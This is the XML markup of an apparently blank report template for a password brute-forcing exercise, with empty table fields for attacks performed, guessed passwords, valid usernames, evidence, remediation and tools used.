          <w:trHeight w:val="161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487C7A1" w14:textId="7CB99FBA" w:rsidR="00184CE7" w:rsidRDefault="00184CE7" w:rsidP="00481AD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Evidence Collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22EDDB4D" w14:textId="77777777" w:rsidR="00442D9F" w:rsidRDefault="00184CE7" w:rsidP="00C97A3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[*If </w:t>
            </w:r>
            <w:r w:rsidR="00442D9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Any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79729D8C" w14:textId="77777777" w:rsidR="00481AD8" w:rsidRDefault="00481AD8" w:rsidP="00C97A3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E2AE494" w14:textId="77777777" w:rsidR="00481AD8" w:rsidRDefault="00481AD8" w:rsidP="00C97A3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C4824C1" w14:textId="77777777" w:rsidR="00481AD8" w:rsidRDefault="00481AD8" w:rsidP="00C97A3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8024F25" w14:textId="43E81357" w:rsidR="00481AD8" w:rsidRPr="00954619" w:rsidRDefault="00481AD8" w:rsidP="00C97A3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7457F0" w:rsidRPr="007457F0" w14:paraId="6CF0DE67" w14:textId="77777777" w:rsidTr="00481AD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8E5D865" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="00481AD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457F0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Guessed Passwords </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34AB7EB9" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="62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229457E" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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45BB4C8" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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D335DD4" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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6A393EA" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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C6E4243" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F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94106" w:rsidRPr="007457F0" w14:paraId="5FC8A471" w14:textId="77777777" w:rsidTr="00481AD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2A6847E" w14:textId="352FA0C4" w:rsidR="00294106" w:rsidRDefault="00294106" w:rsidP="00481AD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Remediation </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EB2E435" w14:textId="77777777" w:rsidR="00294106" w:rsidRPr="007457F0" w:rsidRDefault="00294106" w:rsidP="00481AD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7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57A54438" w14:textId="77777777" w:rsidR="00294106" w:rsidRDefault="00294106" w:rsidP="0029410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8CD888F" w14:textId="77777777" w:rsidR="003125C4" w:rsidRDefault="003125C4" w:rsidP="0029410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9054BAE" w14:textId="77777777" w:rsidR="003125C4" w:rsidRDefault="003125C4" w:rsidP="0029410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174C591" w14:textId="77777777" w:rsidR="003125C4" w:rsidRDefault="003125C4" w:rsidP="0029410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FE99A14" w14:textId="77777777" w:rsidR="003125C4" w:rsidRPr="007457F0" w:rsidRDefault="003125C4" w:rsidP="0029410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457F0" w:rsidRPr="007457F0" w14:paraId="098D03D0" w14:textId="77777777" w:rsidTr="00481AD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F90FBFE" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="00481AD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457F0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282032BD" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="63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647530D" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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94A041F" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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78CF068" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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4EF82C7" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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378BA39" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F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3B471CAC" w14:textId="77777777" w:rsidR="00A96BDF" w:rsidRPr="00A51A96" w:rsidRDefault="00A96BDF" w:rsidP="00A96BDF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96BDF" w14:paraId="495CF063" w14:textId="77777777" w:rsidTr="008C15EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3223BAB7" w14:textId="77777777" w:rsidR="00A96BDF" w:rsidRDefault="00A96BDF" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1FBEDC38" w14:textId="77777777" w:rsidR="00A96BDF" w:rsidRDefault="00A96BDF" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78130CBC" w14:textId="77777777" w:rsidR="00A96BDF" w:rsidRDefault="00A96BDF" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0DDC7193" w14:textId="77777777" w:rsidR="00A96BDF" w:rsidRDefault="00A96BDF" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5CFDCFD2" w14:textId="77777777" w:rsidR="00A96BDF" w:rsidRDefault="00A96BDF" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="101A86B4" w14:textId="77777777" w:rsidR="00A96BDF" w:rsidRDefault="00A96BDF" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="64AE71F1" w14:textId="77777777" w:rsidR="00A96BDF" w:rsidRDefault="00A96BDF" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A293180" w14:textId="77777777" w:rsidR="00A96BDF" w:rsidRDefault="00A96BDF" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F8EEA7C" w14:textId="77777777" w:rsidR="0029469C" w:rsidRDefault="0029469C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E12A7C" w:rsidRPr="00A51A96" w14:paraId="420FA61B" w14:textId="77777777" w:rsidTr="00642FAE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="77097D0F" w14:textId="00A80645" w:rsidR="00E12A7C" w:rsidRPr="003C713F" w:rsidRDefault="00E12A7C" w:rsidP="008C15E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4.5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1E463C" w:rsidRPr="001E463C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Perform Password Brute-forcing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AB48BB0" w14:textId="77777777" w:rsidR="00E12A7C" w:rsidRPr="009F7031" w:rsidRDefault="00E12A7C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2341"/>
        <w:gridCol w:w="1133"/>
        <w:gridCol w:w="3532"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FC3634" w:rsidRPr="00FC3634" w14:paraId="336C94FD" w14:textId="77777777" w:rsidTr="009F7031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6110DD8" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="009F703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C3634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074D16B3" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC36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C3634" w:rsidRPr="00FC3634" w14:paraId="36B886BB" w14:textId="77777777" w:rsidTr="009F7031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79C7E15" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="009F703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C3634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799DD31A" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC36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C3634" w:rsidRPr="00FC3634" w14:paraId="45EEEAD3" w14:textId="77777777" w:rsidTr="009F7031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0157831" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="009F703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C3634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32B0DBD9" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC36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37E47" w:rsidRPr="00FC3634" w14:paraId="1DA3A4A6" w14:textId="77777777" w:rsidTr="009F7031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C69B41A" w14:textId="7E5C4115" w:rsidR="00B37E47" w:rsidRPr="00FC3634" w:rsidRDefault="00B37E47" w:rsidP="009F703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Attack</w:t>
            </w:r>
            <w:r w:rsidR="004166EA">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>s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Performed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2BF2280C" w14:textId="77777777" w:rsidR="00B37E47" w:rsidRDefault="00B37E47" w:rsidP="00FC36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A30492B" w14:textId="77777777" w:rsidR="002D62AD" w:rsidRDefault="002D62AD" w:rsidP="00FC36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B5BCD2E" w14:textId="77777777" w:rsidR="002D62AD" w:rsidRDefault="002D62AD" w:rsidP="00FC36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E2F0A1B" w14:textId="77777777" w:rsidR="002D62AD" w:rsidRPr="00FC3634" w:rsidRDefault="002D62AD" w:rsidP="00FC36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E00D0" w:rsidRPr="00FC3634" w14:paraId="5C184AC5" w14:textId="77777777" w:rsidTr="009F7031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271F6D0" w14:textId="6B1327D7" w:rsidR="003E00D0" w:rsidRPr="00FC3634" w:rsidRDefault="00351A2B" w:rsidP="009F703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Approach Followed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7F712207" w14:textId="77777777" w:rsidR="003E00D0" w:rsidRDefault="003E00D0" w:rsidP="00FC36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ACE0A20" w14:textId="77777777" w:rsidR="00351A2B" w:rsidRDefault="00351A2B" w:rsidP="00FC36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4BAD58B" w14:textId="77777777" w:rsidR="00351A2B" w:rsidRDefault="00351A2B" w:rsidP="00FC36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9166B1F" w14:textId="77777777" w:rsidR="008D5D5C" w:rsidRPr="00FC3634" w:rsidRDefault="008D5D5C" w:rsidP="00FC36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C3634" w:rsidRPr="00FC3634" w14:paraId="09A7740C" w14:textId="77777777" w:rsidTr="009F7031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9B37611" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="009F703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C3634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Cracking the log-in Passwords Successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3474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4C56D13" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC3634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C3634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53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4F65854" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC3634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FC3634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FB6A51" w:rsidRPr="00FC3634" w14:paraId="59E16D1B" w14:textId="77777777" w:rsidTr="009F7031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365780A" w14:textId="3E981CAB" w:rsidR="00FB6A51" w:rsidRPr="00FC3634" w:rsidRDefault="00FB6A51" w:rsidP="009F703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Evidence Collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A8B143B" w14:textId="77777777" w:rsidR="00FB6A51" w:rsidRPr="00FB6A51" w:rsidRDefault="00FB6A51" w:rsidP="00FB6A51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FB6A51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[*If Any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28D6CB64" w14:textId="77777777" w:rsidR="00FB6A51" w:rsidRDefault="00FB6A51" w:rsidP="00FB6A51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  <w:p w14:paraId="2D7B9B2F" w14:textId="77777777" w:rsidR="00FB6A51" w:rsidRDefault="00FB6A51" w:rsidP="00FB6A51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  <w:p w14:paraId="5B72B047" w14:textId="5BCDF606" w:rsidR="00FB6A51" w:rsidRPr="00FC3634" w:rsidRDefault="00FB6A51" w:rsidP="00FB6A51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FC3634" w:rsidRPr="00FC3634" w14:paraId="581E3244" w14:textId="77777777" w:rsidTr="00FC3634">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="781BA88D" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC363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C3634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Password Brute-forcing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC3634" w:rsidRPr="00FC3634" w14:paraId="536B948C" w14:textId="77777777" w:rsidTr="008C15EE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469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197B3D16" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="009F7031" w:rsidRDefault="00FC3634" w:rsidP="00FC363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F7031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Valid Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4665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7E33B6D" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="009F7031" w:rsidRDefault="00FC3634" w:rsidP="00FC363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F7031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Corresponding Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC3634" w:rsidRPr="00FC3634" w14:paraId="2E057906" w14:textId="77777777" w:rsidTr="008C15EE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469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612E916E" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC3634">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="65"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="4665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28E093E" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC3634">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="66"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="575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C3634" w:rsidRPr="00FC3634" w14:paraId="5B8D6CCB" w14:textId="77777777" w:rsidTr="008C15EE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469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2300AB6E" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC3634">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="65"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="4665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BBD630A" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC3634">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="66"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="575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C3634" w:rsidRPr="00FC3634" w14:paraId="537E2C80" w14:textId="77777777" w:rsidTr="008C15EE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469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5B9392D1" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC3634">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="65"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="4665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7744B6B" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC3634">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="66"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="575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F7031" w:rsidRPr="00FC3634" w14:paraId="2063BA36" w14:textId="77777777" w:rsidTr="00E53962">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469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71A61659" w14:textId="77777777" w:rsidR="009F7031" w:rsidRPr="00FC3634" w:rsidRDefault="009F7031" w:rsidP="00E53962">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="65"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="4665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BB45669" w14:textId="77777777" w:rsidR="009F7031" w:rsidRPr="00FC3634" w:rsidRDefault="009F7031" w:rsidP="00E53962">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="66"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="575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F7031" w:rsidRPr="00FC3634" w14:paraId="7FD946DE" w14:textId="77777777" w:rsidTr="00E53962">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469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717D5C7F" w14:textId="77777777" w:rsidR="009F7031" w:rsidRPr="00FC3634" w:rsidRDefault="009F7031" w:rsidP="00E53962">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="65"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="4665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1525D7C" w14:textId="77777777" w:rsidR="009F7031" w:rsidRPr="00FC3634" w:rsidRDefault="009F7031" w:rsidP="00E53962">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="66"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="575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F7031" w:rsidRPr="00FC3634" w14:paraId="3F159D59" w14:textId="77777777" w:rsidTr="00E53962">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469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4D80B759" w14:textId="77777777" w:rsidR="009F7031" w:rsidRPr="00FC3634" w:rsidRDefault="009F7031" w:rsidP="00E53962">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="65"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="4665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E069F2E" w14:textId="77777777" w:rsidR="009F7031" w:rsidRPr="00FC3634" w:rsidRDefault="009F7031" w:rsidP="00E53962">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="66"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="575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C3634" w:rsidRPr="00FC3634" w14:paraId="2DE9315B" w14:textId="77777777" w:rsidTr="008C15EE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469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2A7E022B" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC3634">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="65"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="4665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F25F307" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC3634">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="66"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="575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A6F15" w:rsidRPr="00FC3634" w14:paraId="1EFBAF6E" w14:textId="77777777" w:rsidTr="00DA6F15">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2B7F1B93" w14:textId="2C46DA40" w:rsidR="00DA6F15" w:rsidRPr="00FC3634" w:rsidRDefault="00DA6F15" w:rsidP="00DA6F1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DA6F1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Remediation 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57011A4E" w14:textId="77777777" w:rsidR="00DA6F15" w:rsidRDefault="00DA6F15" w:rsidP="00DA6F1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0C50DC7" w14:textId="77777777" w:rsidR="00DA6F15" w:rsidRDefault="00DA6F15" w:rsidP="00DA6F1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659874F" w14:textId="77777777" w:rsidR="00DA6F15" w:rsidRDefault="00DA6F15" w:rsidP="00DA6F1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C4C0201" w14:textId="77777777" w:rsidR="00DA6F15" w:rsidRDefault="00DA6F15" w:rsidP="00DA6F1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10A30B7" w14:textId="6BDD7FDC" w:rsidR="00DA6F15" w:rsidRPr="00FC3634" w:rsidRDefault="00DA6F15" w:rsidP="00DA6F1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C3634" w:rsidRPr="00FC3634" w14:paraId="3C489258" w14:textId="77777777" w:rsidTr="00FC3634">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6617336B" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC36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C3634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Tools/Services Used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231C7507" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC3634">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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5C24944" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC3634">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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9816043" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC3634">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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356CAC6" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC3634">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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3ADDF01" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC3634">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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050F160" w14:textId="77777777" w:rsidR="00FC3634" w:rsidRPr="00FC3634" w:rsidRDefault="00FC3634" w:rsidP="00FC363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773687B2" w14:textId="77777777" w:rsidR="004166EA" w:rsidRPr="00A51A96" w:rsidRDefault="004166EA" w:rsidP="004166EA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66EA" w14:paraId="372FD6A7" w14:textId="77777777" w:rsidTr="008C15EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0200A13E" w14:textId="77777777" w:rsidR="004166EA" w:rsidRDefault="004166EA" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6D367873" w14:textId="77777777" w:rsidR="004166EA" w:rsidRDefault="004166EA" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5DB7C512" w14:textId="77777777" w:rsidR="004166EA" w:rsidRDefault="004166EA" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6E1026AB" w14:textId="77777777" w:rsidR="004166EA" w:rsidRDefault="004166EA" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7CA853DF" w14:textId="77777777" w:rsidR="004166EA" w:rsidRDefault="004166EA" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="60A685A0" w14:textId="77777777" w:rsidR="004166EA" w:rsidRDefault="004166EA" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6F612F74" w14:textId="77777777" w:rsidR="004166EA" w:rsidRDefault="004166EA" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E66574B" w14:textId="77777777" w:rsidR="004166EA" w:rsidRDefault="004166EA" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
